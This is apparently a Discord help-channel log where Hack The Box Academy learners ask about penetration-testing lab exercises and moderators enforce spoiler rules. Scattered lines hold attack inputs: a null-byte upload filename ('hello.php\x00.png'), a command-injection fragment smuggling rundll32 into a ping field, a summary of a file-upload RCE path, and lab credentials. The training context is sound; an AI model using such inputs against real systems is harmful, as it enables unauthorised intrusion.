#modules
Yeah, I had the same problem as this guy the tools were spitting out unreliable data for some reason
that discrepancy is mentioned in the module
@opaque walrus no spoilers please.
Mention the module, section and a brief question
Someone will reach out to you if they can
Arguably g0b i wouldn't consider it a spoiler as the text tells you the hosts (not what to do ofc, just the hosts)
It was just a description of the lab...
If rdp is slow, use tcp vpn, change vpn regions, or just suffer
Fine.. just.. content being pasted like that
from modules over Tier 0
That's not ok
Unless i missed the screenshot

You did
Ah yeah no, sharing the specifics of host details is spoiling
But the general setup is fine
Spoiler was: Things are going to get interesting ! we are going to pivot and pwn internal hosts kinda
This is first time i saw such challenge. Mostly labs are standalone stuff
pretty cool!
is it normal that i can´t open the hud in the zap proxy?
i'm stuck on an exercise FILE UPLOAD ATTACKS > white list filters
so i'm sending the file that is vulnerable and it says successfully uploaded
but when i try to access it it says internal error
this is my filename : hello.php\x00.png
Please don't share too much
Spoilers for modules over Tier 0 are not allowed.
Read the channel topic
you can try it in your pc it doesn't work
Good evening. I am at “attacking enterprise networks” -> “exploitation & privilege escalation”. While I try to connect to the internal http network there are very slow interactions. Is there something that I did wrong ? Or any tip to make it faster ?
ChatGPT told me to try local port forward instead of dynamic. I haven’t done it yet though.
You shouldn't really ask for help with those modules..
Go back over the module / section documentation
u aren't allowed to ask for help in skill assessment?
I mean.. that one.. it's right at the end of the course
If you're needing to ask for help with that, by that point...
I'd advise going back over the content, and trying to get through it yourself, otherwise you're going to find the exam very hard
if thats your opinion then you are allowed to have your own opinion but if its against the rule then i get it, but dont delete my message because you think i shouldnt ask for help
I deleted it because you were going in the direction of providing spoilers.
You just need to accept that I'm afraid
okay anyone available to help question 1 skill assessment dacl attacks 2
feel free to dm
Better, thank you.
i think it might just be broken, gna reset the lab
fml
lol
@subtle mauve ... seriously
Do not spoil modules over Tier 0
Did you not see the entire conversation above?
I guess not
Gonna go scream at a wall I guess
I just typed the issue I was having and this is the channel it brought me 2. My bad
But what you typed spoiled content from a module over Tier 0
Read the channel subject
Read the ToS you agreed to
I already said my bad
Kinda funny, ngl
@ocean night do you have the answer to help me ?
or you just monitor make sure people dont spoil
I don't have an answer for you, and my job isn't to monitor
I just like hanging here
..and protecting our interests
@ocean night can I please DM you my question?
If it's regarding a Tier 0 module, go for it
If it's above Tier 0, do as @jaunty vigil did above
You can ask in the style that gerbsec did above
You cannot post any spoiling content here.
If anyone could help with question 3 skills assessment NTLM relay attacks that would be awesome, just dm me.
Wasn't watching
Phishing’s bot
(but I wasn't clicking it)
Aha, steamdouche
You should not click on unknown links either 😉
Hello I'm new and wondering if anyone can tell me the way to make the tools.list that is in the foundations setting up part?
Copy/paste
I'm probably missing something since I don't understand this. I could just copy paste that part but would it make the list or not do anything?
.list is just a text file
Ohh would it have a potential function? Or just to remember useful tools?
sudo apt install -y < tools.list iirc should work
I think I get the goal
But the tools.list they give is by no means comprehensive
Not really to introduce the method, more the concept
hey guys
noob questions here, i am currently undergoing the pen tester path, i want to re-do a task have previously completed like getting a flag
if i click reset, will it only reset the machine and a new flag or reset all my progress in the penetration path
can't reset tasks. If you completed them once, they are done.. forever
so only the machine
The modules have static flags
It wouldn't be any good to have rotating/random flags for the learning content
thank you so much
okay
so if i reset a machine my progress will not move from 21% to 19% right ? 
ohh okay
nope. I think the progress only moves on when you complete a section (you know, when you completed the section/page) and not individual questions that you answered
Hi everyone, quick q:
Windows Privesc Module Assessment 1 - Machine has spawned but I can't reach it in any way. Pwnbox, local machine, changed the VPN server twice. Nothing is working. Any advice?
exactly the same problem here in the File Transfers Module
Last time this happened, changing the VPN server fixed the issue, but this time I can't connect in any way.
i create a ticket
I once had a similar problem, my tun0 interface was bugged and didn't get deleted when I restarted my vm, thus creating new corrupt interfaces.. might be worth checking your interfaces
I’ll try. But pwnbox is also not working, so definitely not that.
oh.. well never mind
Thanks for the suggestion tho!
It’s the only assessment left before the last module. Would love to get it done today.
oh damn, things are about to get serious
by last module you mean some cert?
You bet! Excited and terrified at the same time lol
yeah, totally feel that haha
I meant the “Attacking Enterprise Networks” module. It’s the closest thing to the actual CPTS exam I’ve heard.
But yea, I’m doing OSCP soon.
are you aware that the HTB team (m3ben recommended it) to the whole module blind? Like not reading the walkthrough and content but straight up going to the questions?
Yep!!! Recently learned about that. I’ll definitely do that.
the most people that pass the exam recommend take the module blindly
zephyr and dante are also recommended
can we get an update in password attacks - password mutations module? the task at the end takes way too long for a little demonstration of the method... over 94k entries... shortened to 50k after considering password min length of 10...
Why are you assuming the min length is 10?
got it and yeaaa, wasnt min 10 haha
but still, going through those takes A LOT of time
I mean it's more "realistic"
I mean yeaaah.. but 926 mutations of a SINGLE password is kinda too much imo
for a lab
patience is a virtue ¯_(ツ)_/¯
but not in the lab 😭
Cracking and bruteforcing passwords is all about patience
but if you have done something wrong it will take very long time to figure out :=
Yes but i just want to know what i can do with it
nothing that would be legal.
also this channel is for assistance with academy modules, not "how do i hack someone that hacked me"
Hello, any tip on Windows Privilege Escalation Skills Assessment - Part I? I'm getting "Ping request could not find host rundll32.exe. Please check the name and try again.
Address:
"
ping request
🤔
that means the thing running ping took rundll32.exe as its argument
and tried looking it up via dns
Ping request could not find host ;rundll32.exe. Please check the name and try again.
so: something is wrong with your payload
It wasnt for that it was for my report to get my account back, to be more precise, 😭 but alr
if it's to get your htb account back: then leave that with support via emails. It has no business in the discord
if it's an account that has 0 to do with HTB; then it really doesn't belong in the discord
Alr mb
this is probably the thousandth time that i've had to tell people:
your account isn't truly your account, it still belongs to the company/product that you created the account for, this is true for nearly ANY service. Any issues you face with the account is to be resolved with the company/service, as hacking "your account" is still not legal. (not to mention there's virtually no way to verify that it is in fact your account).
All companies/services reserve the right to restrict/ban/delete your account per their ToS.
👌
Got it thank you
Good evening all. I am trying to get through the file transfers module, and am trying to complete the second portion "Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer." I downloaded the provided zip file to my computer. I cannot figure out how to transfer it straight into pwnbox (the link to download is directly under the question, but if i inspect it, there isn't a link i can paste into the browser in pwnbox). i tried navigating to the page in pwnbox, but it wants me to log in there. I tried unzipping the provided file, copying the text, creating a text file in pwnbox, and then zipped it, and separately made a copy that i tar.gz'ed. i then scped them onto the target machine, ssh'ed there, used the gunzip command in the hint, and ran hasher, and my answer is incorrect, so i'm thinking i need to not unzip/copy/paste/rezip etc because somewhere in all of that clearly i'm changing something in the content. So, how can i transfer the zip file from my computer to pwnbox? (this is also a dedicated lab/enterprise modules, which might be why it's asking me to log in)
You either use your VM or the pwnbox not both. If you're using the Pwnbox just download the file from the link straight within the pwnbox, then transfer from there.
Hi - so that's where i'm getting stuck. download "straight from the link" within pwnbox, but pwnbox is requiring that i log back in. Is that normal?
& i can't log in because it says my company has turned on SSO, but then also doesn't recognize my university's domain...
are you trying to log into htb from the pwnbox?
yes- because if i paste in the link for where the download file is, it then asks me to log in.
the resources shouldnt need you to log in to download them
have you tried curl or wget
that's why i'm asking for help. I'm sure i'm overlooking something.
did you right click and copy the link of the file?
when i right click there is no option to copy the link. there's only save as, inspect, source...i'm trying it with wget from within pwnbox now.
are you clicking the green zip button?
the green text. mine doesn't have a button.
is that enterprise?
it is.
mine is a button so there might be a link in the source for you to copy
ah! okay. lol. i got it transferred. wget worked. annnnd gunzip says it's not in a gzip format so i'm right back to where i was.
just try normal zip
the target host doesn't have zip, and the hint suggested gunzip (with specific syntax). i'll figure out what this host has and keep trying. 🙂
unzip :p
it's been a hot minute but i seem to recall that working
does anyone know why smbmap doesn't work but smbclient does?
oh bc of it doesn't support null auth?
Pretty sure you'd need to provide some credentials for SMBMAP even if it's just for listing, try anonymous bind which is no password & no username
anyone else having a really bad connection tonight?
i have changed VPNs and reloaded the target, still having 30sec + response over ssh
no issue here. did you try changing regions?
hi all, could i DM anyone about the syntax of my payload for the XML section of advanced deserialization attacks?
I'm currently working on the HTB Academy – Prompt Injection Attack module, specifically the Skill Assessment titled: "Obtain the flag by getting the CEO banned from their own website."
I've managed to complete most of the steps and I believe I'm really close to the solution. I’ve already found the admin key, but I’m stuck on the final part and can't seem to figure out how to actually get the CEO banned and obtain the flag.
If anyone has done this assessment and can give me a nudge in the right direction (without full spoilers), I’d really appreciate your help!
Hi everyone 👋
I am currently on the penetrating testing path
I am currently in password attacks and using the pwnbox for solving the labs, how do I download the course resources in the pwnbox ?
Nevermind got it 👍
introduction to digital forensics
rapid triage examination & analysis tools
im on the part where they explain the general rules for timestamps in the NTFS file system. in the table for file access operation, it is noted that the accessed timestamp is no* but under the table in the text, it says the accessed timestamp is updated to reflect the time of access i assumed the asterisk to the no means like maybe it differs case by case? can someone explain :o or if i missed anything
not too sure if this is leaning towards spoilers for the module or not tbh, please delete if it is
I’m working through the HTTP Attacks module doing the Exploitation of Request Smuggling exercise, I have confirmed CL.TE vulnerability, used the basic payload from the course, add the additional parameters in the smuggled request and added my current cookie. But the Admin never hits the page or execute the payload. Can someone help me with this?
DM me
how far should I get into academy before starting to solve HTB challenges/machines
im half way done through the foundations path and I am going to start the bug bounty path right after.
how much should I finish before I am able to start actually solving easy CTFs/machines?
it all depends on how you tackle the content, if you look at the content as something to complete, it can take longer. If you look at the content as a way to build your methodology and understanding, then it won't take long at all
a lot of the easy stuff is a few quick google searches away
I (personally) feel that the boxes vary quite a bit in how guessy they are (that might have improved, has been quite a long time for me since I really did any), so you might be unlucky with one, while easily doing another
Hello All - I just started htb and enjoying the same. Every time starting VM and accessing the same from interactive session is not comfortable. Is it possible to access pwnbox from the Kali/Parrot linux installed in my local machine? Thanks in advance
You can use the VPN and get access to the network that way
Hi guys I am doing the modules for cpts path and am stuck in getting started in nibbles can anyone help me
Thank you for rapid response. I have downloaded the VPN file academy-regular.ovpn. Are there any instructions to configure this on my Kali?
All you need to know about the VPN Connection for Academy
Thanks again
Can I DM
yes please
Nibbles is running a nibble blog on port 80 which is hidden behind the nibbleblog directory. Through a directory fuzz we can find an admin panel and are able to login through guessing the admin password. The site is vulnerable to an authenticated file upload RCE which we use to get user shell on the box. After which we find a vulnerable privileg...
-# shameless self-plug 
They have their Walkthrough on it but it isn't running
What do you mean it isn't running? Need waaaay more information
Hi everyone, I'm currently on the 'Intrusion Detection With Splunk (Real-world Scenario)' and I just need clarification for the second question. I was able to find the answer as part of the CallTrace of a rundll32, but this one was using a lowercase 'system32' whereas the one with UNKNOWN segment in its CallTrace was in 'System32'. Was this an intentional part of the question? Sorry, I'm not sure how much detail I'm allowed to talk about.
I can share with you how I approached this if you need. DM if you want.
Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment
on the last question it says
Connect to the StarLight-Protect Wi-Fi network and submit the flag found at 192.168.3.1.
worth 0 points but for some reason im unable to connect even tho i have the password
Bloodhound. For the first time I have experienced problems with bloodhound-python, “channel-binding” errors when using it in HTB modules. Anyone have any tips on how to make it run? Will try using the --ldap-channel-binding flag once back from work but not sure if it will have any effect
I've generally just been using netexec to pull bloodhound data and haven't had any issues there.
You mean just running --users, --groups and such?
No there's bh via ldap. Check their wiki
Wow didn’t know that, will check it out, thanks a lot!
Looks like rk10 posted a link for ya in case you missed it.
nvm figured it out, i got a false positive
Thanks! I’ll check it out 👍
in the wordpress module there is inlanefreight.com ... and i get ip address of the same.... what do i dont see? bc i have the admin pass. and i login the .com its not allowed. when i login on the given IP address i dont get any Wordpress settings. any 1 can help me a bit ?
Just for general knowledge. There are multiple ingestors like RustHound/SOAPHound etc. You can also use something like ldapdomaindump and convert output to use with BH as well as things like ADExplorer etc. So there are many alternatives to generate appropriate .json files that you can later import.
Yeah I read about it. Thing is, ldapdomaindump and ldapsearch works fine for collecting data, but b-p fails (in this case), so will also try the option to convert json output to bh format. Was just surprised that b-p failed. Thanks for comments and info!
one basic doubt. generally most of the systems deploy password policies like threshold for number of invalid passwords. if i give five wrong passwords, systems will lock the user. Our brute force tools like medusa, hydra will try reduced set of common passwords (still they are around 200). Any sane system will not allow this kind of brute forcing. Then what purpose these tools are serving?
Password spray, a lot less risk of locking accounts by bruting the accounts instead of the password. This is mentioned in AD enumeration & attacks module
I have a question regarding the Wi-Fi Evil Twin Module. Has anyone actually done the Assessment at the end? I managed to get the last question right but not the first two. I have literally tried everything and it wont work. On the first question there is a hint that says "Interception", i thought that well the only part where this word is mentioned is the SSL Interception section. Well, guess what? If you try to replicate that exact attack it still wont budge. So my question is has anyone managed to figure this and is able to help me out. I would appreciate that .
This is what i get "
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
" but its the Skills Assessment - WordPress
so what goes wrong?
Double check if everything is fine with URL you provided, can also use --force (Do not check if the target is running WordPress or returns a 403) / play with --detection-mode / use --random-user-agent
yeah i tried all 😦 still not . Ping is working, site is up
Which section is it?
last 1 Skills Assessment - WordPress
My notes showing me that there is a subdomain/vhost -> blog[.]inlanefreight[.]local. You sure you added it to /etc/hosts and pointing WPScan to a right direction?
yeah, i will start over from 0 and see what goes wrong
Anyone??
Hi
I am doing the scf smb share attack, when running responder I am getting this error
I'm almost sure you can run without this flags at all, just with -I
Shameless copy/paste from @foggy siren : I'm stuck at the RDP and SOCKS Tunneling with SocksOver RDP with this error message: "The module SocksOverRDP-Plugin.dll was loaded but the call to DllRegisterServer failed with error code 0x80070005. What am I doing wrong?
I already disabled the real time protection I try to load the x64 version. Already reset the target. Still can´t load the DLL. Do i miss something?
after you disabled you need to make sure the dll exists where you drop it
Tried to get everything into one screenshot 🙂
Does the dll need to be registered with admin privileges? The modules only says that the socks server must be started with admin privileges.
//edit: registration works with admin privileges.
// edit 2: I see in the screenshot of the module that an admin cmd is used. I guess i will add something to #1234357888114364508 and ask for a little hint in the module that regsvr32.exe also requires admin privileges
Hi! Very first post on this Discord, hope I'm in the right place. I'm trying to complete last question in the Linux Fundamentals: Filter Contents module, but I can't get the Pwnbox to connect to https://www.inlanefreight.com/ via cURL. The connection always times out. What could I be doing wrong?
Try with -k -s
So, if I understand correctly, the -k waives the usual security? What does the -s do?
Guys hello I know it is a stupid question but have you done network enumeration with nmap?
Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.
-k skips cert check. use curl -h or --help to see more 🙂
You described the module/section but you have not provided what's your issue with the lab?
I give command nmap target ip -sS get 65535 ports but answer is incorrect and I am stuck what do they mean?
they asking about the total number of tcp ports
nmap -p- -sT --open [IP] should work.
Maybe with -Pn, not sure
Can anyone help me with the XOR ciphertext question from Hashcat module? I tried https://md5decrypt.net/en/Xor/ and putting it in \x format.
In real life it's the worst 😂 . When you have to deal with multiple /24 subnets (or with one /16 -> lol I got a headache even typing this)
yeah it is still scanning
Doing the pentesting in a nutshell model. Why does this keep timing out?
better use your own kali on vm or live pwnbox is usually bad for use
so its on the vm?
I guess skip updating the database will work
alr ill give it a try
How to use vs code
It's often worth a -T4 or a -T5 for a quicker scan then running a slower one later to pick up anything you missed.
Can't skip the update. It said its required.
Someone helped me
Guys nmap finished scanning but didn't list any output? Where is the output?
nmap -p- -sT -T5 --open 10.129.234.237
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 20:09 +04
Nmap done: 1 IP address (1 host up) scanned in 660.28 seconds
and that's all
trying right now))
could it be so that in virtual machine nmap is not working properly?
sU is about udp ports and I need tcp ports
the problem is that my nmap is not listing anything
scan results
no it doesn't work all
Try -Pn
#modules can anyone help me out on "introduction to NoSQL Injection at Skills Assessment II"?
any pointers will be greatly appreciated!
can someone follow me up on this?
Hello all. I'm new to HTB and to this channel. I did a couple of Sherlocks yesterday and was able to power through them. I am stuck on the "TeamWork" Sherlock and not sure if this is the place to get help. They are asking me to get the name of the file being shared by the adversary. But when I click on the link to get the file, there is a browser error saying DNS_PROBE_FINISHED_NXDomain as if the A record for the site doesn't exist. I can't complete this questions (and the box for that matter) without this information.
I suggest asking in https://discord.com/channels/473760315293696010/1172204822519349268. This is for HTB Academy modules support
I must have missed the Sherlocks channel. Thanks for pointing that out
trying right now. trying to guess why it gives no output for the scan. sometimes even tells that the host is down...
I have a little bit of time, if you are still stuck you can DM.
hello,
in the debugging section of the intro to malware analysis module https://academy.hackthebox.com/module/227/section/2496
i have patched the shell.exe and also opened the already patched one that is provided but i still get the "sandbox detected" window when i run the executable.
yeah ill dm you now
Hello! I am pretty new to this field, so be kind plz.... 😛 I am going through the "setting up" module in the InfoSec foundations path. I am trying to spin up a windows 10 vm, but the link provided in the course no longer supports download... I found a legit windows working link by searching on here and I was able to create an iso by downloading "windows installation media" . Unfortunately I am getting an error message at the Booting stage (Timeout error/ EFI Network.... No Media). Am I doing something wrong or do I just need to pay 20$ for an installation key?
Anyone who's done the Enterprise Networks module up for a quick DM to explain something? I've had a look at the walkthrough, so I know what to do but I don't know how I was supposed to work it out.
you don't have to follow the module to a T
in intro to penetration testing, this question: """Which version of vsftpd is installed on the target system? (Format: x.y.z) """ but in the linpeas_results.txt file there isnt any vsftpd at all?
I believe they want the banner from port scanning, not linpeas.
hey im trying to run the command wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh, but its failing to connect, the module explicitly says to run this command, so im not sure whats going wrong
im doing this inside the pwnbox
Are you running the command on the pwnbox parrot machine, or the target machine? The targets have no internet connection.
parrot
Worked fine here
i have a fresh instantiation, so its even more weird
Can you ping google.com?
Are you using the Pwnbox, the in-browser VM, or your own Parrot, "Pwnbox", installation?
Sounds like dns issue
Isn't it always!? 🤣
im in the browser
(Or layer 8)
i can ping google fine
Free account? (Not bought cubes or sub?)
yes free
i cant answer the questions without looking at the file linpeas_results.txt though :(
Use your own vm :)
It's really not that hard to set up
There's a setting up module, and the popular distros all have basic guides to get you started
Hi. Where can I ask a question about Solar from Pro Labs?
Pwnbox is a custom branch of ParrotOS
#1263635449335910531 , read and follow #welcome to verify and access
ok, ill give it a shot thanks
@fathom pendant @dapper moth thanks
Thank you. the target box also does not have unzip, and i can't put tools on it.
gonna be honest then i forgot how i did it then; it's been a hot minute
but i swear there was a way to unzip it in a simple way
If there is anyone who is willing to have a sidebar with me, i've now got all of the commands i've run trying to finish this linux file transfer module and it is still not resulting in the right answer. I am utterly stuck, and actually need to finish this for a class. I'm really hoping someone can see an error.
i've also tried that, and still gotten the wrong answer. I'm utterly stumped, but think that the problem may be that i'm not actually successfully downloading the provided zip file into my attack box to begin with on pwnbox. i used wget, and actually got a file called the right thing, but its content is html, not anything compressed or archived.
Of all the dumb things to be stuck on...this isn't even the point of the module lol
if it's getting an html file then it's not properly grabbing the file
i suggest instead to open network tab in browser; start the download in your host machine; go to network tab; click the download -> copy request
some things don't work well with the -> copy link
it depends on which endpoint the resource is held at
file transfer module yeah?
i'm sorry. i think my brain is broken. say what now? i can't navigate to the page where the file is saved on a browser in pwnbox at all. and yes, file transfer module, linux methods
hm
i can't tell how much of this is harder because i'm in enterprise mode. it seems like i should be able to do it that way.
gimme a sec to see if i can double check on EP;
I'm trying to complete a module and I'm not understanding how the spawn rationing works on the free version. This morning when I checked, it said I had 1/1 spawn remaining so I planned to use it this evening. Now it says I have 0/1 and need to wait until tomorrow. What's happening here?
ok this may seem a bit convoluted but bear with me:
click the link => download the file => ctrl+j to open the downloads window for your browser (in chrome, at least) there should be a link icon to copy the download link that you can wget
reach out to support
Need some help? Learn how to reach the support team on Academy.
yeah enterprise not showing the download seems a bit... ugh imho lol
definitely gonna throw that at #1234357888114364508 though(the system not having unzip); i just checked the writeup -- and it expects you to unzip then transfer. (the question implies you can unzip on the target host)
it's under the storage space
Certain we moved some in-browser download and blob download triggering to be off of a CDN
and thought it was applied to Academy too
but perhaps I am mistaken
a lot of the download stuff is under the /storage/ endpoint (if it's not under the >resources< button)
Am I misunderstanding the problem?
maybe
the problem they were having is they couldn't get a link to wget the file in the first place, regardless of where it's hosted
the enterprise platform opens a new tab to download, whereas the regular academy just allows you to right-click and copy link. Most browsers now though allow you to copy the download link location
[note the source says from enterprise, but the actual link is actually to the regular academy endpoint]
Ok yeah, must still be differences in the EP academy integration
A /feedback certainly wouldn't go amiss
..but know there's a lot in progress atm
my critique is mostly on the fact that the question from the section implies the target host has a way to unzip the upload_nix.zip, it doesn't (tar -xvf errors)
nerp. even the official solution says to download the zip file and unzip on their local machine then transfer
Weird, got no response. Not even the AI chatbot.
That's regarding the Pwnbox, our in-browser workstation
You will still be able to spawn the targets
yeah they were saying they had 1 spawn earlier, didn't use it (i'm guessing) now they have no spawn
¯_(ツ)_/¯
Exactly
Understood, I mis-read what was said then, mb
annnd now i forgor what i was doing 
Looks like you spawned on the 22nd just before the servers midnight
What I'm seeing our side anyway, not sure support will be able to say anything in addition tbh.. but see what they say in the morning when they are back online
What time zone are the servers on?
Sorry, just after 0100 yesterday, not midnight
So you've a few hours until your next credit
UTC
Gotcha. I'll keep that in mind. Maybe the page I was looking at wasn't refreshed? I don't know why else it would show me as having available spawns when I didn't.
probably a caching issue
Hmm, possibly
Not sure to be honest, but certainly mention on your ticket
That kind of time sensitive things should be cached with their time limits taken in to account though
should
depends sometimes; i've had labs timeout because it didn't update the timer (though i think there's a polling update that should update it, it does sometimes get missed)
Cache lifetime defined based upon the regularity of data change, so any changes to a long lived cached object should be invalidated when a change impacts it
e.g. change in last spawn time of pwnbox
Again... should
Taking a note
Hi guys I hope you are okay. I'm in the Cracking passwords with hashcat module in the hybrid section where they ask me to decrypt a hash with a mask. I made the identification with hashid and identified a SHA1. I used the seclist from this repository https://github.com/danielmiessler/SecLists unzipping Rockyou.txt and using these lines in the console to decrypt the hash echo 978078e7845f2fb2e20399d9e80475bc1c275e06 > hash5.txt hashcat -a 6 -m 100 hash5.txt /usr/share/wordlists/rockyou.txt '?d?s'. However, I get status exhausted or it takes more than 5 minutes to decipher the hash. Has anyone used a different dictionary or can someone help me with a clue? I appreciate your help.

Anyone in the future doing the skills assessment for the active Directory bloodhound. Find the percentage of users with a path to global administrator. Use a cypher query and modify it to azure. Simple. Bloodhound will fuck you up, and waste your time
Lesson learned don’t ignore cypher queries. I will use them from now on. I’ve always ignored it and went to bloodhound
I will admit when I’m wrong
Grindr, they have pentesters that are on their grind. Download the app it’s a great forum
No, and not the server to discuss such things.
Just deleted the msg is all
So how does moderating work? Do you guys do it on shifts
How do you guys divvy up the work and moderate? It seems like a lot of work to just sit and moderate a chat. I’m genuinely curious.
A better discussion for #general but no, no shifts or anything. Just online whenever.
Looks like someone got stuck at a similar spot as me right now.
Not sure if they came here? Having trouble answering a question in the Web Recon module, though I am positive I got it (the "Solutions" show me a screenshot of the page I'm supposed to visit on WayBack, censoring the answer, and that's right where I'm looking)...
Gonna sleep on it, but if someone has an idea ^^
hi all, for advanced deserialization attacks xml section, i am very confused on where to add the string for the Type class generated from AssemblyQualifiedName in csharp. I am able to follow the module perfectly until 'Exploiting TeeTrove' section.
If anyone else is facing similar issue, make sure to add checks according to hints inside try - catch block where the main function is being invoked, otherwise it didn't work for me
@idle sundial I deleted your post because it contains spoilers. If you still need help with the module, send me a dm
you can DM me
i got it just like 2 minutes ago.. QQ lol after a couple of days. had a huge misunderstanding
just finished this. you will want to run a command once you get on the target to find the version rather than looking at the linpeas output for it
hello anyone here?
im not attending the Introduction to Windows Command Line
no i have a problem
i wish i was just hello
anyway
in one of the section it talked about scheduled tasks
so i made one but it does not do its job even when i run it manually
C:\Windows\System32>schtasks /query /tn move_these_pics /v /fo list
Folder: \
HostName: AHMAD_23
TaskName: \move_these_pics
Next Run Time: N/A
Status: Queued
Logon Mode: Interactive only
Last Run Time: 4/23/2025 11:56:46 AM
Last Result: 0
Author: AHMAD_23\ahmad
Task To Run: cmd.exe /c robocopy C:\Users\ahmad\Documents\MEGA\obsidian C:\Users\ahmad\Documents\MEGA\obsidian\pics *.png /XO /MOV /XC
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: ahmad
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
this is it and idk what is wrong
can someone help pls
quick update
it only run when the laptop is on charger
also how to fix
i'm working on the tcpdump fundamentals labs but the right answer doesnt register as correct and keeps saying its wrong what are some known fixes? ill add a screenshot
Looks like its got "stop on battery" mode on
Hey i tried running nmap -sS stealth scan without mentioning sudo in the kali linux OS and it is running Stealth scan without requiring sudo privileges but in the "Network Enumeration using NMAP" module, the author mentioned nmap stealth scan requires raw socket privileges to perform scan. In my case, how it is working? i was really confused and i asked chatgpt about it and it responded to check if nmap binary has suid bit assigned and it was also not assigned.
run sudo
did you run "sudo su" in the beginning? Or is your user in the "root" user group? Regardless, the reason why the author mentioned sudo, is because (correct me if I am wrong) sudo privileges are required to send raw tcp packets (without completing TCP Handshake)
Turns out you should probably copy-paste instead of type. That letter was not what it looked like...
https://academy.hackthebox.com/module/144/section/1256
android fundamentals:
Hello, I'm currently working on the "Shells&payloads" module's live engagement, I'm a little ashamed to ask this (but hey we're here to learn) and I have no clue on how to access a web page (from the foothold box, not from the pwnbox) without any web browser installed on the machine. Am I missing something here ? (I tried xdg-open with the address, but I just get the source code of the page and it's not very helpful).
na but like im asking how do i know that im not trying a machine that requires using tools/methodologies I haven't learned about yet
type firefox & in the terminal 
If you have pivoting knowledge you can also establish a tunnel and use the browser on your own pwnbox/vm
OMG! I've been searching in the menu to launch it from there for several minutes. Thanks a lot! 😅
Yes I know tunneling is possible but I don't have the knowledge yet
you will almost always run into something you haven't learned yet
then how am i supposed to solve the machine💀
the same way others solve active machines: research
:P academy doesn't cover every single topic and vulnerability
There's a certain balance to it. You will certainly need to develop the skill to do research, but if you don't even know where to start, that doesn't help. I've been there, just opened up a box with zero prior knowledge, and it does not help at all
but they cover enough to build you up with the research skills
half of our job is googling
this is why i put in the caveat to my initial message:
- If you look at academy modules as something to just complete, you're cooked
- If you look at it as a way of building your methodology and understanding, you're gonna do better
Personally I read a few walkthroughs too and spend a lot of time in Academy, still do. You get a sense for general concepts you need over and over again, so starting from there, you can build your knowledge further and try to apply it on active machines
then still the question remains, when do i know i reached this "balance" point
trial and error I'm afraid.
i wouldn't rely on walkthroughs (especially for academy content)
im not looking at it as something to just complete. i just dont know when i have learned enough to start with beginner machines and not be wasting time
or demotivating myself
yes I meant walkthroughs of machines. I tried some that went way over my head, looked how other people solved it
reading walkthroughs isn't inherently bad; it's just how you use it
as long as it's not active content 
if you're worried about when you'll be ready, you'll never be ready
Generally: you don't unless you actually try the labs every so often, while it's ok to use official writeups you'll notice a certain point when you have developed a methodology and can do boxes with less and less help needed
I think that captures what I meant by trial and error.
Just give some machines a whirl, and you'll keep failing until one day you don't.
For me it's literally about exposure sometimes. It makes more and more sense over time
reframing how you view it is important as well
I still consider myself pretty much a noob, just as a disclaimer by the way ^^
sure it may take you a few hours or days to solve a box: but at the end you learned something
I can tell you that even after working in this field you still won't be feeling "ready". Research and googling / trying / failing is part of our job, doesn't matter in which cybersecurity domain you will end up being.
you should concern yourself with speed after you've gotten a hold of the basics
same 
if you're worried about completing the boxes as fast as the extremely skilled people that get bloods, then you're trying to climb a steep hill without any practice
They blood user in 3 mins while I'm still spawning the box in 3 mins 
the modules teach you, in part, the methodology to identify the weakness -- not just that a weakness is there
Maybe "balance" was not the best way to put it, I just meant to express that I felt like being in a very similar spot.
If the first thing on HTB is spawning a machine, even from starting point, if you've hardly even ever seen a Linux CLI (as myself a few months ago), then you're not gonna have a good time.
But you don't have to finish every last Academy module either to get started.
I'd really say to try it out. Maybe stick to some paths in Academy (another mistake I made, I kinda randomly took modules that didn't mesh well / went way over my head at first), and you're gonna get more and more comfortable.
Wishing you a great journey either way, you got this, and most importantly: enjoy the ride 
will defo try this
ill finish fundamentals and do some modules from the CBBH path and ill try some boxes from there
Agree, highly recommend doing the InfoSec Foundations Path and at least the Cracking Into HTB or Getting Started or Pentest in a nutshell modules
I've only really done the Getting started module but have heard good things about the other two
thank you everyone for the help. yall the 🐐 s
you got this!
Tho its not usually this slow are there ongoing server issues with spawning targets?
been a bit slower than usual for me too recently, though I don't think it was that bad yet? don't think it's 10 minutes
Seems it timed out and I clicked spawn again which created < 60s so I guess it was having a moment
@digital pendant be careful with sharing images that contain answers
idk what I shared now but my bad
Hello, have anyone completed Hacking wordpress module?
actually having problem with the question -> Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
your screenshot contained the answer to a question in it; that's all lol literally just the answer in the box
was about to ping you here, this is the best place for your questions, be careful with DMing people 👍
I got dm'ed too it seems.
I have not btw
don't dm users without asking per the #rules; if someone wants to dm to assist you, they'll offer
ok sry will not happen further
Hello, I have a question on Attacking common services, the Attacking Email Services, can someone give me a hint on finding the password?
@mighty shell which specific section of the wordpress module are you stuck on ?
Cause since i received some Dms asking for help so i thought theirs nothing wrong in it, sorry my bad @fathom pendant
I just finished the Pasword Attacks Lab - Easy ,
How long did it take for you to crack the password and how many threads have you used ?
@digital pendant The skill assesment part
@digital pendant I got the Shell of erika but couldn't figure out where the flag for this question is
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
I can't give you the answer but try to be aggressive with your scans... from there you should see what is vulnerable and how to abuse this
Doing the AD Administration: Guided Lab Part II at the moment, where 2 boxes are spawned.
https://academy.hackthebox.com/module/74/section/1393
The first target works, the second, a domain controller does not, with the same credentials.
Target(s): 10.129.x.x (ACADEMY-IAD-WIN10) ,10.129.x.x (ACADEMY-IAD-DC01)
RDP to 10.129.x.x (ACADEMY-IAD-WIN10) ,10.129.x.x (ACADEMY-IAD-DC01) with user "image" and password "Academy_student_AD!"
Thats the output when i try to connect the DC:
